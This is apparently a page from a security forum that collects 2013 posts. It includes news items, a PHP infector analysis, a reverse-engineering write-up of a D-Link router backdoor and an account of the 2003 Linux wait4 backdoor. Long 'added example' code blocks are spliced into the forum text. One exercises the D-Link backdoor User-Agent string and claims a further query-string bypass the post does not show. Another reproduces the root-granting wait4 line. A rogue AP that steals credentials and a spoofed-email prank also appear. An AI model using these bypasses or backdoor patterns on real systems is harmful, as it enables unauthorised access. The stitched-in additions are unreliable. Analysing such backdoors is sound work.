     Source: Revision 79c612cd - Add MS13-080 (CVE-2013-3897): Internet Explorer CDisplayPointer Use-After-Fre... - Metasploit Framework - Metasploit Redmine Interface
  6. [h=1]Kdms Team hackers hijack Rapid7 website using faxed DNS change request[/h]

     [h=2]"Hacking like it's 1964"[/h]

     By John E Dunn | Techworld | Published: 17:01, 11 October 2013

     A pro-Palestinian hacktivist group managed to briefly hijack the Metasploit website of security firm Rapid7 on Friday after faxing a DNS change request to its registrar, the firm's chief research officer HD Moore has admitted.

     News of the attack emerged when newbie hackers 'Kdms Team' announced the takeover on Twitter with a series of brief messages concluding with a simple "Hello Rapid7." The attack appears to have lasted for a period of nearly an hour before Rapid7's Moore took to Twitter to reply.

     "I can confirm that the DNS settings were changed for a few minutes and pointed to 74.53.46.114," he said.

     After ruefully admitting the attack had been "creative", Moore said that it had occurred after a simple bogus fax request to its registrar, Register.com. "Hacking like its 1964," Moore added, gamely.

     Earlier this week, the same Kdms Team burst on to the hacktivist scene with an identical and equally embarrassing attack on several Internet firms, including security firms AVG, Avira and messaging firm WhatsApp. That attack pivoted around a more orthodox password change request to Network Solutions.

     Where the group got the DNS change idea from is no mystery. In late August the New York Times suffered a serious domain-redirection attack by the Syrian Electronic Army (SEA) that kept the site offline for several days.

     As with the New York Times, Rapid7's Moore admitted the firm does not use domain locking to raise the level of authentication required for DNS change requests.

     "We sign binaries, publish checksums, and authenticate updates, so not a big deal, just annoying," commented Moore.

     "When security companies can be hijacked, that's a good indicator of how fragile DNS is and what a single point of failure DNS providers have become," commented Robert Hansen, technical evangelist at WhiteHat Security.

     "Hijacking session tokens, stealing usernames and passwords and redirecting email are just some of the things that become possible when DNS is hijacked," he said.

     Source: Kdms Team hackers hijack Rapid7 website using faxed DNS change request - Techworld.com
  7. [h=1]PHP Infector[/h]

     Posted on October 12, 2013 by darryl

     A reader wanted me to analyze a PHP file that was found on his hacked WordPress site. The script is made up of three parts, as you can see. The top two sections contain an array of Base64-encoded strings. The bottom section references the arrays and performs the main functions.

     My first thought was to replace each of the array variables with the actual decoded strings. Then I could read the script at the bottom and figure out what it's doing. But replacing each of the variable names with the values from the array manually would be a pain! (Anyone got a better idea? If so, let me know.)

     Whenever I come across a problem, I try to find a generic solution that I can keep using in the future. Here's what I came up with...

     First I take each of the top two sections and separate the encoded values by rows. So I take this:

     And use search/replace to make it look like this:

     Then I modified Converter to base64-decode each row separately:

     Then I replaced each row with a pipe delimiter (since it wasn't being used anywhere):

     I did the same for the second section:

     I wrote a program that does a search and replace of the array values. I entered the search string that corresponded to the top section and pasted in the decoded strings with the pipe delimiter to get the result.

     The second section was next.

     All done! This script probably won't execute properly because some of the strings need to be quoted, but at least you can get a much better idea of what's going on. Basically this downloads a file from a website, gets the URL and visits it. It essentially serves up a drive-by link to unsuspecting visitors. The iframe link is the landing page of Sweet Orange. The link changes every couple of minutes or so.

     I'll need to think about this more and see if there's another generic solution. If not, I'll add this method to Converter in the future.

     Source: PHP Infector | Kahu Security
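The generic substitution the author is after, as an added Python example (not code from the post or from Kahu Security's Converter): decode every array whose elements are all Base64, then inline the decoded strings, quoted, at each $var[N] reference in the rest of the script. The sample PHP is constructed here with a placeholder URL, not the real drive-by link.

```python
"""Generic decoder for the Base64-array PHP infector layout described in the post.

Added example, not code from the post or from Kahu Security's Converter: it
finds every `$var = array("...", ...)` whose elements all decode as Base64,
drops those definitions, and rewrites each `$var[N]` reference in the rest of
the script as a quoted PHP string literal, so the result reads like the
author's manually substituted version (and stays valid PHP, since callable
strings such as 'preg_match'(...) are legal).  The sample script is constructed
here, with a harmless placeholder URL in place of any real drive-by link.
"""
import base64
import re

ARRAY_RE = re.compile(r"(\$\w+)\s*=\s*array\s*\((.*?)\)\s*;", re.S)
STRING_RE = re.compile(r"""(['"])(.*?)\1""", re.S)
REF_RE = re.compile(r"(\$\w+)\[(\d+)\]")


def php_quote(s):
    """Render s as a PHP single-quoted literal."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def decode_b64_arrays(src):
    """Return ({var: [decoded, ...]}, [(start, end), ...]) for arrays of Base64 strings."""
    tables, spans = {}, []
    for m in ARRAY_RE.finditer(src):
        items = [s for _, s in STRING_RE.findall(m.group(2))]
        try:
            decoded = [base64.b64decode(s, validate=True).decode("utf-8") for s in items]
        except (ValueError, UnicodeDecodeError):
            continue                      # not a Base64 table; leave it alone
        if decoded:
            tables[m.group(1)] = decoded
            spans.append(m.span())
    return tables, spans


def deobfuscate(src):
    """Strip the Base64 tables and inline their decoded values at each $var[N] use."""
    tables, spans = decode_b64_arrays(src)
    out = src
    for start, end in reversed(spans):   # delete from the back so earlier offsets stay valid
        out = out[:start] + out[end:]

    def inline(m):
        values = tables.get(m.group(1))
        idx = int(m.group(2))
        if values is None or idx >= len(values):
            return m.group(0)            # reference to something we did not decode
        return php_quote(values[idx])

    return REF_RE.sub(inline, out), tables


def _b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed sample with the three-part layout from the post: two Base64 tables,
# then code that indexes into them. The URL is a placeholder, not a real landing page.
SAMPLE_PHP = (
    "<?php\n"
    '$_x = array("%s", "%s", "%s");\n'
    '$_y = array("%s", "%s", "%s");\n'
    "$c = $_x[0]($_x[1]);\n"
    "$_x[2]($_y[0], $c, $m);\n"
    "echo $_y[1] . $m[0] . $_y[2];\n"
) % (_b64("file_get_contents"), _b64("http://example.invalid/link"), _b64("preg_match"),
     _b64('/http[^"]+/'), _b64('<iframe src="'), _b64('"></iframe>'))

if __name__ == "__main__":
    cleaned, tables = deobfuscate(SAMPLE_PHP)
    print(cleaned)
```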
  8. [h=1]Rouge_AP v9 for Kali Linux[/h]

     My rogue AP that steals creds from HTTPS, running under Kali Linux. In this demo, my host is a laptop with 2 wireless adapters. One is connected to a WiFi access point, and the other WLAN adapter is then used for rogue connections.

     Get it here: https://app.box.com/s/iaij9vpf64f0r90...
  9. Reverse Engineering a D-Link Backdoor
By Craig | October 12, 2013

All right. It's Saturday night, I have no date, a two-liter bottle of Shasta and my all-Rush mix-tape… On a whim I downloaded firmware v1.13 for the DIR-100 revA. Binwalk quickly found and extracted a SquashFS file system, and soon I had the firmware's web server (/bin/webs) loaded into IDA:

[Image: Strings inside /bin/webs]

Based on the above strings listing, the /bin/webs binary is a modified version of thttpd which provides the administrative interface for the router. It appears to have been modified by Alphanetworks (a spin-off of D-Link). They were even thoughtful enough to prepend many of their custom function names with the string "alpha":

[Image: Alphanetworks' custom functions]

The alpha_auth_check function sounds interesting! This function is called from a couple of different locations, most notably from alpha_httpd_parse_request:

[Image: Function call to alpha_auth_check]

We can see that alpha_auth_check is passed one argument (whatever is stored in register $s2); if alpha_auth_check returns -1 (0xFFFFFFFF), the code jumps to the end of alpha_httpd_parse_request, otherwise it continues processing the request. Some further examination of the use of register $s2 prior to the alpha_auth_check call indicates that it is a pointer to a data structure which contains char* pointers to various pieces of the received HTTP request, such as HTTP headers and the requested URL:

[Image: $s2 is a pointer to a data structure]

We can now define a function prototype for alpha_auth_check and begin to enumerate elements of the data structure:

    struct http_request_t
    {
        char unknown[0xB8];
        char *url;    // At offset 0xB8 into the data structure
    };

    int alpha_auth_check(struct http_request_t *request);

alpha_auth_check itself is a fairly simple function. It does a few strstr's and strcmp's against some pointers in the http_request_t structure, then calls check_login, which actually does the authentication check. If any of the strstr's / strcmp's or the check_login call succeed, it returns 1; else, it redirects the browser to the login page and returns -1:

[Image: alpha_auth_check code snippet]

Those strstr's look interesting. They take the requested URL (at offset 0xB8 into the http_request_t data structure, as previously noted) and check to see if it contains the strings "graphic/" or "public/". These are sub-directories under the device's web directory, and if the requested URL contains one of those strings, then the request is allowed without authentication. It is the final strcmp, however, which proves a bit more compelling:

[Image: An interesting string comparison in alpha_auth_check]

This is performing a strcmp between the string pointer at offset 0xD0 inside the http_request_t structure and the string "xmlset_roodkcableoj28840ybtide"; if the strings match, the check_login function call is skipped and alpha_auth_check returns 1 (authentication OK).

A quick Google for the "xmlset_roodkcableoj28840ybtide" string turns up only a single Russian forum post from a few years ago, which notes that this is an "interesting line" inside the /bin/webs binary. I'd have to agree.

So what is this mystery string getting compared against? If we look back in the call tree, we see that the http_request_t structure pointer is passed around by a few functions. It turns out that the pointer at offset 0xD0 in the http_request_t structure is populated by the httpd_parse_request function:

[Image: Checks for the User-Agent HTTP header]
[Image: Populates http_request_t + 0xD0 with a pointer to the User-Agent header string]

This code is effectively:

    if(strstr(header, "User-Agent:") != NULL)
    {
        http_request_t->0xD0 = header + strlen("User-Agent:") + strspn(header, " \t");
    }

Knowing that offset 0xD0 in http_request_t contains a pointer to the User-Agent header, we can now re-construct the alpha_auth_check function:

    #define AUTH_OK 1
    #define AUTH_FAIL -1

    int alpha_auth_check(struct http_request_t *request)
    {
        if(strstr(request->url, "graphic/") ||
           strstr(request->url, "public/") ||
           strcmp(request->user_agent, "xmlset_roodkcableoj28840ybtide") == 0)
        {
            return AUTH_OK;
        }
        else
        {
            // These arguments are probably user/pass or session info
            if(check_login(request->0xC, request->0xE0) != 0)
            {
                return AUTH_OK;
            }
        }

        return AUTH_FAIL;
    }

In other words, if your browser's user agent string is "xmlset_roodkcableoj28840ybtide" (no quotes), you can access the web interface without any authentication and view/change the device settings (a DI-524UP is shown, as I don't have a DIR-100 and the DI-524UP uses the same firmware):

[Image: Accessing the admin page of a DI-524UP]

Based on the source code of the HTML pages and some Shodan search results, it can be reasonably concluded that the following D-Link devices are likely affected:

- DIR-100
- DI-524
- DI-524UP
- DI-604S
- DI-604UP
- DI-604+
- TM-G5240

Additionally, several Planex routers also appear to use the same firmware:

- BRL-04UR
- BRL-04CW

You stay classy, D-Link.

Sursa: Reverse Engineering a D-Link Backdoor - /dev/ttyS0
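The following is an added example, not code from the post or from the firmware: a stand-alone C model of the reconstructed alpha_auth_check decision, fed by constructed raw HTTP requests so the three unauthenticated paths (the "graphic/" and "public/" substrings and the User-Agent string) can be exercised side by side. The check_login() stub always rejects, so every request that comes back "allowed" got in without credentials. The request paths and header values are constructed samples. The last sample goes one step beyond what the post shows: because the URL tests in the reconstruction are strstr() substring matches rather than path-prefix matches, a request whose query string merely contains "public/" is let through as well.

```c
/*
 * Added example, not code from the original post or the firmware: a model of
 * the reconstructed alpha_auth_check, run over constructed HTTP requests.
 * check_login() is a stub that always fails, so "allowed" below always means
 * one of the unauthenticated paths matched.
 */
#include <stdio.h>
#include <string.h>

#define AUTH_OK      1
#define AUTH_FAIL   -1
#define BACKDOOR_UA "xmlset_roodkcableoj28840ybtide"

struct http_request {
    const char *url;         /* the firmware keeps this pointer at +0xB8 */
    const char *user_agent;  /* and this one at +0xD0 */
};

/* Stand-in for the real credential/session check: always rejects here. */
static int check_login(const struct http_request *r)
{
    (void)r;
    return 0;
}

/* Same decision logic as the reconstruction above. The URL tests are substring
 * matches anywhere in the URL, not prefix matches on the path. */
int alpha_auth_check(const struct http_request *r)
{
    if (strstr(r->url, "graphic/") || strstr(r->url, "public/") ||
        strcmp(r->user_agent, BACKDOOR_UA) == 0)
        return AUTH_OK;
    if (check_login(r) != 0)
        return AUTH_OK;
    return AUTH_FAIL;
}

/* Pull the request-line URL and the User-Agent value out of a raw request,
 * skipping "User-Agent:" plus spaces/tabs the way httpd_parse_request does.
 * A missing header is modelled as an empty string. Returns 0 on success. */
int parse_request(const char *raw, char *url, size_t ulen, char *ua, size_t alen)
{
    const char *p = strchr(raw, ' ');            /* skip the method */
    const char *e;
    size_t n;

    if (!p) return -1;
    p++;
    e = strpbrk(p, " \r\n");
    if (!e) return -1;
    n = (size_t)(e - p);
    if (n >= ulen) return -1;
    memcpy(url, p, n);
    url[n] = '\0';

    ua[0] = '\0';
    for (p = strchr(raw, '\n'); p; p = strchr(p, '\n')) {
        p++;                                     /* start of the next header line */
        if (strncmp(p, "User-Agent:", 11) != 0) continue;
        p += 11;
        p += strspn(p, " \t");
        e = strpbrk(p, "\r\n");
        n = e ? (size_t)(e - p) : strlen(p);
        if (n >= alen) return -1;
        memcpy(ua, p, n);
        ua[n] = '\0';
        break;
    }
    return 0;
}

/* 1 if the request reaches the admin pages without credentials, 0 if it is
 * sent to the login page, -1 if it could not be parsed. */
int request_allowed(const char *raw)
{
    char url[512], ua[512];
    struct http_request r;
    if (parse_request(raw, url, sizeof url, ua, sizeof ua) != 0)
        return -1;
    r.url = url;
    r.user_agent = ua;
    return alpha_auth_check(&r) == AUTH_OK;
}

int main(void)
{
    /* constructed sample requests; paths are illustrative */
    static const char *samples[] = {
        "GET /admin.htm HTTP/1.1\r\nHost: 192.168.0.1\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
        "GET /admin.htm HTTP/1.1\r\nHost: 192.168.0.1\r\nUser-Agent: " BACKDOOR_UA "\r\n\r\n",
        "GET /admin.htm HTTP/1.1\r\nUser-Agent:\t" BACKDOOR_UA "\r\n\r\n",
        "GET /graphic/logo.gif HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
        "GET /admin.htm?public/ HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-40.*s allowed=%d\n", (int)strcspn(samples[i], "\r\n"),
               samples[i], request_allowed(samples[i]));
    return 0;
}
```

The parser only models what the post documents (the request-line URL and the User-Agent value); the real httpd_parse_request locates the header with strstr() as well, so it is looser still.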
  10. [h=3]CreateRemoteThread vs. RtlCreateUserThread[/h]
In this post I will shed light on a slight difference between the "CreateRemoteThread" and "RtlCreateUserThread" functions. I will also show how this slight difference could affect your code, especially if you are implementing an anti-attaching trick. The difference is in the way the CONTEXT structure is initialized for the new thread.

Let's first take the "CreateRemoteThread" function in disassembly. On Windows XP SP3, at address 0x7C810550, we can see a call to the non-exported "_BaseInitializeContext@20" function which, as its name implies, sets the initial values of the registers in the CONTEXT structure. Here we focus on only two registers, EIP and EAX, which are set in the following manner:

1) The EIP register is set to the address of either "_BaseThreadStartThunk@8" or "_BaseProcessStartThunk@8", depending on the fifth parameter (in this case the fifth parameter is TRUE and EIP is set to the address of "_BaseThreadStartThunk@8").
2) The EAX register is set to the user-defined entry point (user-defined here means the value passed to "CreateRemoteThread" in the "lpStartAddress" parameter).

The first thing we conclude is that "_BaseThreadStartThunk@8" later executes the user-defined entry point.

Now let's take the "RtlCreateUserThread" function in disassembly and see how the CONTEXT structure for the new thread is initialized. A different function, "RtlInitializeContext", is used for this task. Going into this function, we can see that it is as simple as setting:

1) The EAX register to zero.
2) The EIP register to the user-defined entry point.

A question arises here: what is this useful for?

If a thread tries to query its own entry point by calling "ZwQueryInformationThread" with the "ThreadInformationClass" parameter set to ThreadQuerySetWin32StartAddress, the initial value of EAX is the value returned in the "ThreadInformation" parameter. In most cases this is fine, since almost all threads are created by "CreateRemoteThread" and hence the user-defined entry point is always returned. But threads created by "RtlCreateUserThread" (e.g. threads created by debuggers to attach to running processes) will not be able to query their own entry point this way: the value returned in the "ThreadInformation" parameter will always be zero, as the initial value of EAX was zero.

Imagine a TLS callback running in the context of the attaching thread and trying to query the thread's entry point by calling "ZwQueryInformationThread" as part of detecting the debugger: the entry point returned will be zero, since the initial value of EAX was zero.

A good solution for this problem is using "NtQuerySystemInformation" with the "SystemInformationClass" parameter set to SystemProcessesAndThreadsInformation to get information about all current processes and threads, then locating the proper thread and its SYSTEM_THREAD_INFORMATION structure. Once the right structure is found, the thread entry point can be read from the "StartAddress" member.

The code showing how to use "NtQuerySystemInformation" to extract thread entry points can be found here. An example demonstrating how to use "NtQuerySystemInformation" as an anti-attaching trick can be found here.

N.B. This topic has been tested on Windows XP SP3. You can follow me on Twitter @waleedassar

Sursa: waliedassar: CreateRemoteThread vs. RtlCreateUserThread
  11. Supposedly it's for our safety, they're protecting us from terrorists. Slaves of the Americans. Go Russia!
  12. Yes, about 3 years ago I also sent one to the students at my university, "from" the e-mail of the professor whose answers everyone was eager to get. It's useful for pranks.
  13. University is necessary! If you have a bachelor's degree (from a large share of universities), you basically get 16% more salary. Of course, you don't learn much there: crappy subjects, and the useful ones may not be taught well... But if you like it and want to work in the field, get your damn hands dirty and learn on your own. When it comes to getting hired, you also have to prove to employers that you know something. How do you do that? You show them the projects you've made. Have you made any? Make some. Or go jerk off. It's your future, it's your choice.
  14. In no case would it be one where you give out your real data: phone numbers, photos of yourself (which often contain the GPS location where they were taken), your friends, the places you frequent... I'd advise you to clean up your profile a bit and delete as many personal things as possible.
  15. Anyway, the theme was bought; it was paid for by kwe.
  16. Nytro

    Free e-books.

    I tried 2 (random) C++ books and they work. There's a picture and a direct download link too. Which one exactly isn't working for you?
  17. Nytro

    Free e-books.

    [h=5]Free e-books.[/h]
    1. Linux http://www.efytimes.com/e1/fullnews.asp?edid=116902 Top 10 Most Wanted Linux Books
    2. Assembly http://www.efytimes.com/e1/fullnews.asp?edid=117964
    3. C 35 Free eBooks On C Programming
    4. C++ http://www.efytimes.com/e1/fullnews.asp?edid=117660
    5. C# http://www.efytimes.com/e1/fullnews.asp?edid=117598
    6. Java http://www.efytimes.com/e1/fullnews.asp?edid=117834
    7. Python http://www.efytimes.com/e1/fullnews.asp?edid=117094
    8. Perl http://efytimes.com/e1/fullnews.asp?edid=117324
    9. Ruby 22 Free eBooks On Ruby
    10. Javascript http://www.efytimes.com/e1/fullnews.asp?edid=117236
    11. JQuery http://www.efytimes.com/e1/fullnews.asp?edid=117488
  18. Ctrl + F5. It's only happening on your end.
  19. Regarding the problem with the buttons, post a screenshot of the page. Regarding the theme? Copyright? Huh? With how many problems this crappy theme has had, I'm not giving them "copyright", screw the people who made it.
  20. #ro0ted Attacking SIP/VoIP Servers by Faith Sursa: https://www.cyberguerrilla.org/blog/?p=15957
  21. Paunch, the author of Blackhole Exploit kit arrested in Russia
Wang Wei, The Hacker News - Monday, October 07, 2013

According to security analyst Maarten Boone, working at Fox-IT, the developer of the notorious Blackhole Exploit Kit, 'Paunch', and his partners were arrested in Russia recently.

Blackhole Exploit Kit, which is responsible for the majority of web attacks today, is crimeware that makes it simple for just about anyone to build a botnet. The kit was developed by a hacker who uses the nickname "Paunch" and his team; it has gained wide adoption and is currently one of the most common exploit frameworks used for web-based malware delivery.

The Blackhole exploit kit is a framework for delivering exploits via compromised or third-party websites, serving up a range of old and new exploits for Oracle's Java, Adobe's Flash and other popular software to take control of victims' machines.

At the time of writing, no police authority or press outlet has confirmed the claim made by Maarten about the arrest of the malware author. Stay tuned to THN for updates on the story.

In April 2013, the Russian hackers and developers behind the Carberp botnet, which stole millions from bank accounts worldwide, were also arrested.

Sursa: Paunch, the author of Blackhole Exploit kit arrested in Russia - The Hacker News
  22. [h=1]The Linux Backdoor Attempt of 2003[/h]
October 9, 2013 By Ed Felten

Josh wrote recently about a serious security bug that appeared in Debian Linux back in 2006, and whether it was really a backdoor inserted by the NSA. (He concluded that it probably was not.) Today I want to write about another incident, in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we don't know who it was that made the attempt, and we probably never will.

Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.

But some people didn't like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.

But on Nov. 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.

What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]

A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said "= 0" rather than "== 0". The normal thing to write in code like this is "== 0", which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is "= 0", which has the effect of setting the user ID to zero.

Setting the user ID to zero is a problem because user ID number zero is the "root" user, which is allowed to do absolutely anything it wants: to access all data, change the behavior of all code, and compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it's a classic backdoor.

This is a very clever piece of work. It looks like innocuous error checking, but it's really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.

But the attempt didn't work, because the Linux team was careful enough to notice that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.

Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we'll never know.

[Post edited (2013-10-09) to correct the spelling of Larry McVoy's name.]

Sursa: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
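An added example, not part of the article: a user-space C model of the two inserted lines, with the "= 0" version beside the "== 0" version it was disguised as. The kernel's task_struct is replaced by a one-field struct and the option bits carry the kernel's values; everything else is constructed for the demonstration. It makes visible a detail the prose only implies: the parenthesised assignment evaluates to 0, so the whole condition is false, retval is never set to -EINVAL, and the call silently succeeds with the caller now running as uid 0. The extra parentheses around the assignment are also exactly what keeps gcc's -Wparentheses quiet, so the compiler gives a reviewer no hint.

```c
/*
 * Added example, not part of the original article: a model of the two lines
 * inserted into wait4(), backdoored and innocuous versions side by side.
 * WAIT_WCLONE / WAIT_WALL carry the kernel's __WCLONE / __WALL values.
 */
#include <stdio.h>

#define WAIT_WCLONE 0x80000000u
#define WAIT_WALL   0x40000000u
#define EINVAL      22

/* stand-in for the kernel's task_struct; only the field the patch touched */
struct task { unsigned int uid; };

/* The inserted lines as they appeared in the CVS mirror. "current->uid = 0"
 * is an assignment whose value is 0, so the && is always false: retval stays 0
 * and the only effect is that the caller's uid has been zeroed. */
int backdoored_wait4_check(unsigned int options, struct task *current)
{
    int retval = 0;
    if ((options == (WAIT_WCLONE|WAIT_WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What a reviewer skimming the diff would read it as: reject the forbidden
 * option combination when the caller is root, changing nothing. */
int innocuous_wait4_check(unsigned int options, const struct task *current)
{
    int retval = 0;
    if ((options == (WAIT_WCLONE|WAIT_WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Helpers that run one scenario and report the return value or the uid
 * afterwards, so the two versions can be compared on the same input. */
int retval_of_check(int backdoored, unsigned int options, unsigned int uid_before)
{
    struct task t = { uid_before };
    return backdoored ? backdoored_wait4_check(options, &t)
                      : innocuous_wait4_check(options, &t);
}

unsigned int uid_after_check(int backdoored, unsigned int options, unsigned int uid_before)
{
    struct task t = { uid_before };
    if (backdoored) backdoored_wait4_check(options, &t);
    else            innocuous_wait4_check(options, &t);
    return t.uid;
}

int main(void)
{
    unsigned int magic = WAIT_WCLONE|WAIT_WALL;
    printf("innocuous : uid 1000, magic options -> retval %d, uid %u\n",
           retval_of_check(0, magic, 1000), uid_after_check(0, magic, 1000));
    printf("innocuous : uid 0,    magic options -> retval %d, uid %u\n",
           retval_of_check(0, magic, 0), uid_after_check(0, magic, 0));
    printf("backdoored: uid 1000, magic options -> retval %d, uid %u\n",
           retval_of_check(1, magic, 1000), uid_after_check(1, magic, 1000));
    printf("backdoored: uid 1000, other options -> retval %d, uid %u\n",
           retval_of_check(1, WAIT_WCLONE, 1000), uid_after_check(1, WAIT_WCLONE, 1000));
    return 0;
}
```

Only the exact option combination __WCLONE|__WALL triggers the assignment; any other options leave the uid alone, which is why the line reads as a narrow sanity check rather than as a privilege change.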
  23. [h=1]Anonymous no more: Twitter engineer, UConn security analyst among 13 indicted for 'Operation Payback'[/h][h=2]Not all the people named in the FBI indictment fit the hacker stereotype[/h]
By Greg Sandoval on October 8, 2013 07:11 pm

Some of the men indicted last week for allegedly taking part in the scores of denial-of-service attacks launched by hacktivist group Anonymous in 2010 don't fit the stereotype of a pajamas-wearing teen hacker causing havoc from mom's basement. For example, The Verge has learned that defendant Phillip Simpson is a 28-year-old IT professional who works for a test-preparation service. Anthony Tadros, 22, is a student at the University of Connecticut who, ironically, once worked as a security analyst for the school, according to his LinkedIn profile. Geoffrey Commander is 65 years old. And then there's Ryan Gubele, a 27-year-old former contract employee of Amazon. In June, Gubele began working as a site reliability engineer for Twitter, and is currently still employed there.

Last week, the US Department of Justice alleged in a 28-page indictment that Gubele and the other 12 defendants helped Anonymous, the hacktivist collective, disrupt or cause the collapse of web sites operated by Bank of America, MasterCard and multiple global antipiracy groups. Some of the companies were attacked for refusing to process donations made to WikiLeaks, the group that published leaked US diplomatic cables. Others came under fire for supporting antipiracy efforts. Anonymous dubbed the DDoS campaign Operation Payback.

In the indictment, federal prosecutors allege that it was Gubele who aided Anonymous by tracking the effectiveness of the group's attacks on the Motion Picture Association of America, the trade group for the Hollywood studios. They also accuse him of illegally accessing computer systems of at least one of the targets during Operation Payback, which began in September 2010 and ended the following January. The indictment doesn't say whether Gubele played any role in the December 2010 attack on Amazon. According to Gubele's LinkedIn profile, he began working for the web retailer in August 2010 and departed the same month that Operation Payback concluded.

Gubele and Simpson did not respond to interview requests. Twitter and Amazon declined to comment. Tadros, the security analyst, said in a text: "It's in my best interest not to answer any questions about my situation while the case is ongoing."

Feds likely want to send a message

US law enforcement has begun cracking down on computer crime and appears to be making an extra effort to track Anonymous members, who consider themselves activists for social change and come from all over the globe. During the past decade, the group has hacked or launched denial of service attacks against the Church of Scientology, numerous governments, Sony, the New York Stock Exchange, and sites hosting child porn. While numerous arrests have been made, the percentage of Anonymous members tried for computer offenses is believed to be a tiny fraction of the group's potential members. Nonetheless, the US government likely wants to send a message.

Sursa: Anonymous no more: Twitter engineer, UConn security analyst among 13 indicted for 'Operation Payback' | The Verge
  24. Detecting Avast Antivirus Via Web Browsers Description: This is the method I use for detecting Avast antivirus. You can use it with other antiviruses too; all you need is to change the image path. If you tested this with other software/antivirus, please post it in the comments below. This is the online demo of the method described: Test_Avast Sursa: Detecting Avast Antivirus Via Web Browsers Simple and effective. Another method would be to put blocked content on a site, have that content appear in a hidden frame, and check with JS whether "content blocked" or the original content shows up.
  25. Derbycon 2013 - Pass-The-Hash 2: The Admin's Revenge - Skip Duckwall, Chris Campbell
Description: Some vulnerabilities just can't be patched. Pass-The-Hash attacks against Windows enterprises are still successful and are more popular than ever. Since the PTH-Suite was released at BlackHat last year, Microsoft published their guide for mitigating the attack. Skip and Chris will cover some of the shortcomings in their strategies and offer practical ways to detect and potentially prevent hashes from being passed on your network. Learn how to stop an attacker's lateral movement in your enterprise.
Bio: "Chris: Co-presented the PTH talk last year at Blackhat. Also spoke at BsidesLV, Derbycon, Shmoocon & BsidesPR. www.obscuresec.com, @obscuresec. Works for Crucial Security (Harris Corp). Skip: Co-presented the PTH talk last year at Blackhat. Also spoke at Defcon, Derbycon. passing-the-hash.blogspot.com, @passingthehash on twitter. Works for Accuvant Labs"
For more information please visit: DerbyCon : Louisville, Kentucky; Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)
Sursa: Derbycon 2013 - Pass-The-Hash 2: The Admin's Revenge - Skip Duckwall, Chris Campbell